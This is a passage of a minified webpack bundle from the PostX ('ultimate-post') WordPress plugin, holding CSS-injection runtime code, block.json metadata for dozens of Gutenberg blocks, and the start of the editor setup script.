o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(26107),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},41115:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(87616),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},87624:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(6500),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},26135:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(30024),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},64201:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(71729),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},88106:(e,t,l)=>{"use strict";var o=l(93379),a=l.n(o),i=l(7795),n=l.n(i),r=l(90569),s=l.n(r),p=l(3565),c=l.n(p),u=l(19216),d=l.n(u),m=l(44589),g=l.n(m),y=l(4432),b={};b.styleTagTransform=g(),b.setAttributes=c(),b.insert=s().bind(null,"head"),b.domAPI=n(),b.insertStyleElement=d(),a()(y.Z,b),y.Z&&y.Z.locals&&y.Z.locals},93379:e=>{"use strict";var t=[];function l(e){for(var l=-1,o=0;o<t.length;o++)if(t[o].identifier===e){l=o;break}return l}function o(e,o){for(var i={},n=[],r=0;r<e.length;r++){var s=e[r],p=o.base?s[0]+o.base:s[0],c=i[p]||0,u="".concat(p," ").concat(c);i[p]=c+1;var d=l(u),m={css:s[1],media:s[2],sourceMap:s[3],supports:s[4],layer:s[5]};if(-1!==d)t[d].references++,t[d].updater(m);else{var g=a(m,o);o.byIndex=r,t.splice(r,0,{identifier:u,updater:g,references:1})}n.push(u)}return n}function a(e,t){var l=t.domAPI(t);return l.update(e),function(t){if(t){if(t.css===e.css&&t.media===e.media&&t.sourceMap===e.sourceMap&&t.supports===e.supports&&t.layer===e.layer)return;l.update(e=t)}else l.remove()}}e.exports=function(e,a){var i=o(e=e||[],a=a||{});return function(e){e=e||[];for(var n=0;n<i.length;n++){var r=l(i[n]);t[r].references--}for(var s=o(e,a),p=0;p<i.length;p++){var c=l(i[p]);0===t[c].references&&(t[c].updater(),t.splice(c,1))}i=s}}},90569:e=>{"use strict";var t={};e.exports=function(e,l){var o=function(e){if(void 0===t[e]){var l=document.querySelector(e);if(window.HTMLIFrameElement&&l instanceof window.HTMLIFrameElement)try{l=l.contentDocument.head}catch(e){l=null}t[e]=l}return t[e]}(e);if(!o)throw new Error("Couldn't find a style target. This probably means that the value for the 'insert' parameter is invalid.");o.appendChild(l)}},19216:e=>{"use strict";e.exports=function(e){var t=document.createElement("style");return e.setAttributes(t,e.attributes),e.insert(t,e.options),t}},3565:(e,t,l)=>{"use strict";e.exports=function(e){var t=l.nc;t&&e.setAttribute("nonce",t)}},7795:e=>{"use strict";e.exports=function(e){if("undefined"==typeof document)return{update:function(){},remove:function(){}};var t=e.insertStyleElement(e);return{update:function(l){!function(e,t,l){var o="";l.supports&&(o+="@supports (".concat(l.supports,") {")),l.media&&(o+="@media ".concat(l.media," {"));var a=void 0!==l.layer;a&&(o+="@layer".concat(l.layer.length>0?" ".concat(l.layer):""," {")),o+=l.css,a&&(o+="}"),l.media&&(o+="}"),l.supports&&(o+="}");var i=l.sourceMap;i&&"undefined"!=typeof btoa&&(o+="\n/*# sourceMappingURL=data:application/json;base64,".concat(btoa(unescape(encodeURIComponent(JSON.stringify(i))))," */")),t.styleTagTransform(o,e,t.options)}(t,e,l)},remove:function(){!function(e){if(null===e.parentNode)return!1;e.parentNode.removeChild(e)}(t)}}}},44589:e=>{"use strict";e.exports=function(e,t){if(t.styleSheet)t.styleSheet.cssText=e;else{for(;t.firstChild;)t.removeChild(t.firstChild);t.appendChild(document.createTextNode(e))}}},87462:(e,t,l)=>{"use strict";function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var l=arguments[t];for(var o in l)Object.prototype.hasOwnProperty.call(l,o)&&(e[o]=l[o])}return e},o.apply(this,arguments)}l.d(t,{Z:()=>o})},16998:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/accordion-item","title":"Accordion Item","category":"ultimate-post","description":"Add desired blocks to inner sections.","parent":["ultimate-post/accordion"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post"}')},10981:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/accordion","title":"Accordion","category":"ultimate-post","keywords":["accordion","toggle","collapse","expand","fag","postx accordion"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},82402:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/advanced-list","title":"List - PostX","category":"ultimate-post","keywords":["list","list postx","advanced list","icon list"],"supports":{"align":["center","wide","full"],"html":false,"reusable":false},"textdomain":"ultimate-post"}')},58063:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/list","title":"List","description":"Create & customize a list item","category":"ultimate-post","parent":["ultimate-post/advanced-list"],"textdomain":"ultimate-post"}')},7110:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/advanced-filter","title":"Advanced Post Filter","category":"ultimate-post","keywords":["Advanced Post Filter","Post Filter","Filter Block","PostX Filter","Post Grid","Grid View","Article","Grid","Post Listing"],"supports":{"inserter":false},"usesContext":["postId"],"providesContext":{"advanced-filter/cId":"clientId"},"textdomain":"ultimate-post"}')},54685:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/filter-clear","title":"Clear Filter","category":"ultimate-post","keywords":["Clear Filter","Reset Filter","PostX Filter","Post Grid","Grid View","Article","Grid","Post Listing","filter"],"textdomain":"ultimate-post","supports":{},"usesContext":["post-grid-parent/postBlockClientId","advanced-filter/cId"],"ancestor":["ultimate-post/advanced-filter"]}')},31631:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/filter-search-adv","title":"Search Filter","category":"ultimate-post","keywords":["Search Filter","Post Filter","filter"],"textdomain":"ultimate-post","supports":{},"usesContext":["post-grid-parent/postBlockClientId"],"ancestor":["ultimate-post/advanced-filter"]}')},50941:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/filter-select","title":"Select Filter","category":"ultimate-post","keywords":["PostX Filter","Post Filter","filter"],"textdomain":"ultimate-post","supports":{},"usesContext":["post-grid-parent/postBlockClientId"],"ancestor":["ultimate-post/advanced-filter"]}')},12728:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/advanced-search","title":"Search - PostX","category":"ultimate-post","textdomain":"ultimate-post","keywords":["Advanced Search","Search Block","Search Result","Search Form"],"supports":{"align":["center","wide","full"]}}')},14331:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/button-group","title":"Button Group","category":"ultimate-post","keywords":["button group","buttons","group","btn","button"],"supports":{"align":["center","wide","full"],"html":false,"reusable":false},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},4405:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"parent":["ultimate-post/button-group"],"name":"ultimate-post/button","description":"Create & customize button","title":"Button","category":"ultimate-post","supports":{"html":false,"reusable":false},"textdomain":"ultimate-post"}')},28166:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/dark-light","title":"Dark/Light - PostX","category":"ultimate-post","keywords":["dark","light","night mode"],"textdomain":"ultimate-post","supports":{"align":["center","wide","full"]}}')},83408:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/gallery","title":"PostX Gallery","category":"ultimate-post","keywords":["gallery","image","media"],"textdomain":"ultimate-post","supports":{"align":["center","wide","full"]}}')},19209:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/heading","title":"Heading","category":"ultimate-post","description":"Display heading or title with the ultimate controls.","textdomain":"ultimate-post","keywords":["heading","title","section"],"supports":{"align":["center","wide","full"]}}')},2204:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/image","title":"Image","description":"Display images with the ultimate controls.","category":"ultimate-post","keywords":["Image","Media","Gallery"],"textdomain":"ultimate-post","supports":{"align":["center","wide","full"]}}')},59963:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/news-ticker","title":"News Ticker","category":"ultimate-post","keywords":["News Ticker","Post News"],"textdomain":"ultimate-post","supports":{"align":["center","wide","full"]}}')},41850:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-1","title":"Post Grid #1","category":"ultimate-post","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},98453:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-2","title":"Post Grid #2","category":"ultimate-post","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},18781:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-3","title":"Post Grid #3","category":"ultimate-post","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},57433:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-4","title":"Post Grid #4","category":"ultimate-post","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},89122:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-5","title":"Post Grid #5","category":"ultimate-post","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},35341:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-6","title":"Post Grid #6","category":"ultimate-post","description":"Post Grid in gradient display with tile blocks.","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},40577:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-7","title":"Post Grid #7","category":"ultimate-post","description":"Post Grid with gradient display in vertical overlay","keywords":["Post Grid","Grid View","Article","Post Listing","Grid"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},53991:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-pagination","title":"Advanced Post Pagination","category":"ultimate-post","keywords":["Pagination"],"supports":{"inserter":false},"usesContext":["postId","post-grid-parent/postBlockClientId","post-grid-parent/pagi"],"textdomain":"ultimate-post","ancestor":["ultimate-post/post-grid-parent"]}')},26887:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-grid-parent","title":"Post Block","category":"ultimate-post","description":"Post Block from PostX.","keywords":["Post Grid","Grid View","Post Listing","Article","Grid"],"supports":{"align":["center","wide","full"],"inserter":false,"reusable":false},"providesContext":{"post-grid-parent/postBlockClientId":"cId","post-grid-parent/pagi":"pagi"},"usesContext":["postId"],"textdomain":"ultimate-post"}')},20629:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-list-1","title":"Post List #1","description":"Listing your posts in the classic style.","category":"ultimate-post","keywords":["Post Listing","Listing","Article","List View","List"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},95596:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-list-2","description":"Listing our posts with a big post at the top.","title":"Post List #2","category":"ultimate-post","keywords":["Post Listing","Listing","Article","List View","List"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},2719:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-list-3","title":"Post List #3","description":"Listing your posts with images on the left side.","category":"ultimate-post","keywords":["Post Listing","Listing","Article","List View","List"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},66026:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-list-4","title":"Post List #4","description":"Listing your posts with a big image on top and small images at the bottom.","category":"ultimate-post","keywords":["Post Listing","Listing","Article","List View","List"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},76463:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-module-1","title":"Post Module #1","description":"Display your big posts on the left and small posts on right.","category":"ultimate-post","keywords":["Post List","Post Grid","Post Module","Latest Post","Module"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},65994:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-module-2","title":"Post Module #2","description":"Listing your posts with big posts on the top.","category":"ultimate-post","keywords":["Post List","Post Grid","Post Module","Latest Post","Module"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},74384:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-slider-1","title":"Post Slider #1","description":"Dynamic post slider with lots of settings.","category":"ultimate-post","keywords":["Post Slider","Post Carousel","Slide","Slider","Feature"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},1106:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-slider-2","title":"Post Slider #2","description":"An advanced & highly customizable Post Slider","category":"ultimate-post","keywords":["Post Slider","Post Carousel","Slide","Slider","Feature"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},29299:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/social-icons","title":"Social Icons","category":"ultimate-post","keywords":["Social","Icons","Social Media","Links"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post"}')},60134:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/social","title":"Social item","category":"ultimate-post","parent":["ultimate-post/social-icons"],"description":"Create & customize a Social icon.","keywords":["link","social"],"supports":{"reusable":false,"html":false},"textdomain":"ultimate-post"}')},74921:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/star-rating","title":"Star Ratings","category":"ultimate-post","description":"Show ratings and reviews on your website.","keywords":["star ratings","rating","rating star","review"],"textdomain":"ultimate-post","supports":{"align":["wide","full"],"reusable":true}}')},92857:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/table-of-content","title":"Table of Contents","category":"ultimate-post","keywords":["Table of Contents","TOC","Article","Post Listing","Navigation"],"supports":{"align":["center","wide","full"],"reusable":false},"textdomain":"ultimate-post"}')},55350:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/tabs","title":"Tabs","category":"ultimate-post","keywords":["tab","Tabs","Tab View","Container","tabs PostX"],"supports":{"html":false,"reusable":false,"align":["center","wide","full"]},"textdomain":"ultimate-post"}')},71573:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/tab-item","title":"Tab Item","category":"ultimate-post","parent":["ultimate-post/tabs"],"description":"Create & customize Tab Item","keywords":["tab","Tabs","Tab View","Container","Tabs PostX","tabs PostX"],"supports":{"reusable":false,"__experimentalMoveToolbar":false,"html":false},"textdomain":"ultimate-post"}')},34433:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/ultp-taxonomy","title":"Taxonomy","category":"ultimate-post","keywords":["Taxonomy","Category","Category List"],"supports":{},"textdomain":"ultimate-post"}')},52031:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/wrapper","title":"Wrapper","category":"ultimate-post","keywords":["Wrapper","Wrap","Column"],"supports":{"align":["center","wide","full"]},"description":"Wrapper block for Gutenberg.","textdomain":"ultimate-post"}')},6947:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/youtube-gallery","title":"Youtube Gallery","category":"ultimate-post","keywords":["youtube","gallery","video","playlist"],"textdomain":"ultimate-post","supports":{"align":["wide","full"],"reusable":true}}')},49681:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/advance-post-meta","title":"Advanced Post Meta","category":"postx-site-builder","description":"Display Advance Post Meta with the ultimate controls.","textdomain":"ultimate-post","keywords":["Advanced Post Meta","Post Meta","Meta"],"supports":{"align":["center","wide","full"],"reusable":false}}')},94772:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/archive-title","title":"Archive Title","category":"postx-site-builder","description":"Display archive titles and customize them as you need.","textdomain":"ultimate-post","keywords":["archive","dynamic title","title"],"supports":{"align":["center","wide","full"],"reusable":false}}')},23826:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/author-box","title":"Post Author Box","category":"postx-site-builder","description":"Display Post Author details and customize them as you need.","textdomain":"ultimate-post","keywords":["Post Author Box","Author","Blog Post Author"],"supports":{"align":["center","wide","full"],"reusable":false}}')},81837:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/next-previous","title":"Post Next Previous","category":"postx-site-builder","description":"Display Previous and Next Post links with thumbnails.","textdomain":"ultimate-post","keywords":["Next Previous","Post Navigation","Navigation","Next","Previous"],"supports":{"align":["center","wide","full"],"reusable":false}}')},45536:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-author-meta","title":"Post Author Meta","category":"postx-site-builder","description":"Display Post Author Meta with the ultimate controls.","textdomain":"ultimate-post","keywords":["Post Author Meta","Author Meta","Post Author"],"supports":{"align":["center","wide","full"],"reusable":false}}')},88211:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-breadcrumb","title":"Post Breadcrumb","category":"postx-site-builder","description":"Display Breadcrumb to let visitors see navigational links.","textdomain":"ultimate-post","keywords":["breadcrumb","Post breadcrumb","breadcrumbs"],"supports":{"align":["center","wide","full"],"reusable":false}}')},72927:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-category","title":"Post Category","category":"postx-site-builder","description":"Display Post Categories and style them as you need.","textdomain":"ultimate-post","keywords":["Category","Taxonomy","Categories"],"supports":{"align":["center","wide","full"],"reusable":false}}')},30577:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-comment-count","title":"Post Comment Count","category":"postx-site-builder","description":"Display Post Comment count and customize it as you need.","textdomain":"ultimate-post","keywords":["Post Comment Count","Post Comment","Comment Count"],"supports":{"align":["center","wide","full"],"reusable":false}}')},50540:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-comments","title":"Post Comments","category":"postx-site-builder","description":"Display the Post Comment section and customize it as you need.","textdomain":"ultimate-post","keywords":["Comments","Comment Form"],"supports":{"align":["center","wide","full"],"reusable":false}}')},59943:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-content","title":"Post Content","category":"postx-site-builder","description":"Display Post Content in a customized and organized way.","textdomain":"ultimate-post","keywords":["Content","Desctiption","Post Content"],"supports":{"align":["center","wide","full"],"reusable":false}}')},39180:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-date-meta","title":"Post Date Meta","category":"postx-site-builder","description":"Display Post Publish/Modified Date and customize it as you need.","textdomain":"ultimate-post","keywords":["Date","Modify","Modified","Date Meta","Post Date"],"supports":{"align":["center","wide","full"],"reusable":false}}')},34776:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-excerpt","title":"Post Excerpt","category":"postx-site-builder","description":"Display Post Excerpt if required and customize as you need.","textdomain":"ultimate-post","keywords":["excerpts","post excerpt"],"supports":{"align":["center","wide","full"],"reusable":false}}')},96283:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-featured-image","title":"Post Featured Image/Video","category":"postx-site-builder","description":"Display the Featured Image/Video and adjust the visual look.","textdomain":"ultimate-post","keywords":["Image","Video","Featured Image","Featured Video","Post Featured Video","Post Featured Image"],"supports":{"align":["center","wide","full"],"reusable":false}}')},46693:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-reading-time","title":"Post Reading Time","category":"postx-site-builder","description":"Display Expecting Reading Time and customize it as you need.","textdomain":"ultimate-post","keywords":["Post Reading Time","Post Reading","Reading Time"],"supports":{"align":["center","wide","full"],"reusable":false}}')},14980:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-social-share","title":"Post Social Share","category":"postx-site-builder","description":"Display Social Share Buttons to let visitors share posts to their social profiles.","textdomain":"ultimate-post","keywords":["Post Share","Social Share","Social Media","Share"],"supports":{"align":["center","wide","full"],"reusable":false}}')},75832:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-tag","title":"Post Tag","category":"postx-site-builder","description":"Display Post Tags and style them as you need.","textdomain":"ultimate-post","keywords":["Tag","Post Tags","Tags"],"supports":{"align":["center","wide","full"],"reusable":false}}')},96787:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-title","title":"Post Title","category":"postx-site-builder","description":"Display the Post Title and customize it as you need.","textdomain":"ultimate-post","keywords":["heading","title","post title"],"supports":{"align":["center","wide","full"],"reusable":false}}')},15648:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-view-count","title":"Post View Count","category":"postx-site-builder","description":"Display the post view count and customize it as you need.","keywords":["view","Post View Count","Post View","View","statistics"],"textdomain":"ultimate-post","supports":{"html":false,"align":true}}')}},t={};function l(o){var a=t[o];if(void 0!==a)return a.exports;var i=t[o]={id:o,exports:{}};return e[o](i,i.exports,l),i.exports}l.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return l.d(t,{a:t}),t},l.d=(e,t)=>{for(var o in t)l.o(t,o)&&!l.o(e,o)&&Object.defineProperty(e,o,{enumerable:!0,get:t[o]})},l.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),l.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),l.r=e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},l.nc=void 0,(()=>{"use strict";var e=l(87462),t=l(67294),o=l(85701),a=(l(9544),l(20223),l(71184),l(42177),l(30365),l(48844),l(99038),l(92756),l(1845),l(5930),l(32633),l(5715),l(24484),l(67879),l(47127),l(31693),l(96405),l(83674),l(82177),l(37549),l(72528),l(92038),l(18866),l(43053),l(82738),l(15816),l(24072),l(5109),l(21123),l(77794),l(58910),l(32294),l(84764),l(3609),l(28578),l(80400),l(71807),l(28871),l(36653),l(35391),l(74955),l(31145),l(37216),l(7004),l(85562),l(96519),l(35946),l(68944),l(1565),l(53056),l(41544),l(23061),l(75574),l(41458),l(1818),l(29044),l(11182),l(13427),l(68425),l(86303),l(28913),l(64255),l(88111),l(81213),l(31366),l(41977),l(5207),l(85556),l(69735),l(25364)),i=l(3780),n=l(60405),r=l(70674),s=l(34285);const{__}=wp.i18n,{domReady:p}=wp,{updateCategory:c,unregisterBlockType:u}=wp.blocks,{subscribe:d,dispatch:m}=wp.data,{render:g}=wp.element,{registerPlugin:y}=wp.plugins,{addFilter:b}=wp.hooks,{InspectorControls:v}=wp.blockEditor;window.ultpDevice="lg",window.bindCssPostX=!1;let h=!1;c("ultimate-post",{icon:(0,t.createElement)("img",{className:"ultp-insert-box-popup",style:{height:"30px",marginTop:"-1px"},src:ultp_data.url+"assets/img/logo-sm.svg",alt:"PostX"})}),jQuery(document).on("click",".editor-entities-saved-states__save-button",(function(){h||(h=!0,(0,s.R)({handleBindCss:!0,preview:!1}),setTimeout((()=>{h=!1}),1e3))}));const f=()=>{setTimeout((()=>{jQuery(".edit-widgets-header__actions .components-button").click((()=>{const 